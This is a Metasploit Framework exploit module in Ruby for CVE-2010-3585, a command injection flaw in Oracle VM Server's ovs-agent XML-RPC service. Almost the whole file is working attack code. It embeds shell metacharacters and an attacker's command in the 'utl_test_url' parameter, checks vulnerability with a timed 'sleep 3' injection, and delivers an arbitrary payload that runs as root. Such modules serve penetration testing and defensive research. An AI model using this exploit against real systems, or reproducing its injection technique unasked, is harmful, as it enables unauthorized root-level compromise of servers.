1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 |
## # $Id: oracle_vm_agent_utl.rb 10821 2010-10-25 20:58:49Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle VM Server Virtual Server Agent Command Injection', 'Description'=> %q{ This module exploits a command injection flaw within Oracle\'s VM Server Virtual Server Agent (ovs-agent) service. By including shell meta characters within the second parameter to the 'utl_test_url' XML-RPC methodCall, an attacker can execute arbitrary commands. The service typically runs with root privileges. NOTE: Valid credentials are required to trigger this vulnerable. The username appears to be hardcoded as 'oracle', but the password is set by the administrator at installation time. }, 'Author' => [ 'jduck' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 10821 $', 'References' => [ # ovs-agent.spec:- Fix ovs agent command injection [orabug 10146644] {CVE-2010-3585} ['CVE', '2010-3585'], ['OSVDB', '68797'], ['BID', '44047'] ], 'Privileged' => true, 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Payload'=> { 'Space' => 512, 'BadChars' => '<>', 'DisableNops' => true, 'Keys'=> ['cmd', 'cmd_bash'], }, 'Targets'=> [ ['Automatic', { }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 12 2010' )) register_options( [ Opt::RPORT(8899), OptBool.new('SSL', [ true, 'Use SSL', true ]), OptString.new('CMD', [ false,"A single command to execute instead of the payload" ]), OptString.new('USERNAME', [ true,"The user to authenticate as", 'oracle']), OptString.new('PASSWORD', [ true,"The password to authenticate with" ]) ], self.class) deregister_options( 'HTTP::junk_params', # not your typical POST, so don't inject params. 'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now. ) end def go(command) datastore['BasicAuthUser'] = datastore['USERNAME'] datastore['BasicAuthPass'] = datastore['PASSWORD'] xml = <<-EOS <?xml version="1.0"?> <methodCall> <methodName>utl_test_url</methodName> <params><param> <value><string>PARAM1</string></value> </param></params> <params><param> <value><string>PARAM2</string></value> </param></params> <params><param> <value><string>PARAM3</string></value> </param></params> <params><param> <value><string>PARAM4</string></value> </param></params> </methodCall> EOS sploit = rand_text_alphanumeric(rand(128)+32) sploit << "';" + command + ";'" xml.gsub!(/PARAM1/, 'http://' + rand_text_alphanumeric(rand(128)+32) + '/') xml.gsub!(/PARAM2/, sploit) xml.gsub!(/PARAM3/, rand_text_alphanumeric(rand(128)+32)) xml.gsub!(/PARAM4/, rand_text_alphanumeric(rand(128)+32)) res = send_request_cgi( { 'uri'=> '/RPC2', 'method' => 'POST', 'ctype'=> 'application/xml', 'data' => xml, }, 5) if not res if not session_created? print_error('Unable to complete XML-RPC request') return nil end # no response, but session created!!! return true end case res.code when 403 print_error('Authentication failed!') return nil when 200 print_good('Our request was accepted!') return res end print_error("Encountered unexpected #{res.code} reponse:") print_error(res.inspect) return nil end def check print_status("Attempting to detect if the server is vulnerable...") # Try running/timing sleep 3 start = Time.now go('sleep 3') elapsed = Time.now - start if elapsed >= 3 and elapsed <= 4 return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit print_status("Attempting to execute the payload...") cmd = datastore['CMD'] cmd ||= payload.encoded if not go(cmd) raise RuntimeError, "Unable to execute the desired command" end handler end end |